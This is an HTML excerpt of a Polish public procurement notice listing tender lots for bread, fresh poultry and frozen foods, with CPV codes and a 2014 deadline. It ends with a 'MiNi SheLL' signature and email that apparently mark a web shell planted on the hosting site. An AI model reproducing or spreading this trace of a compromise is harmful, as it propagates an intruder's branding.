<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka pszenna 100 g
Chleb zwykły krojony 
Pączki z nadzieniem 100 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> świeży drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczak 
Nogi z kurczaka podudzie  pałka
Porcja rosołowa z kurczaka korpusy, szyje
Filet z kurczaka bez skóry.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> produkty mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone różyczki
Brukselka mrożona 
Groszek zielony mrożony 
Kalafior mrożony 
Marchew kostka mrożona 
Mieszanka owoców mrożonych POLTINO lub równoważna 
Mieszanka warzywna Macedońska Bonduelle lub równoważna 
Śliwka drylowana mrożona 
Truskawka mrożona 
Wiśnie bez pestek mrożone 
Zupa barszcz ukraiński mrożony Hortex lub równoważna
Zupa grzybowa mrożona Hortex lub równoważna
Zupa fasolowa mrożona Hortex lub równoważna
Leczo mrożone Hortex lub równoważne
Brokuły mrożone różyczki
Brukselka mrożona 
Groszek zielony mrożony 
Kalafior mrożony 
Marchew kostka mrożona 
Mieszanka owoców mrożonych POLTINO lub równoważna 
Mieszanka warzywna Macedońska Bonduelle lub równoważna 
Śliwka drylowana mrożona 
Truskawka mrożona 
Wiśnie bez pestek mrożone 
Zupa barszcz ukraiński mrożony Hortex lub równoważna
Zupa grzybowa mrożona Hortex lub równoważna
Zupa fasolowa mrożona Hortex lub równoważna
Leczo mrożone Hortex lub równoważne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com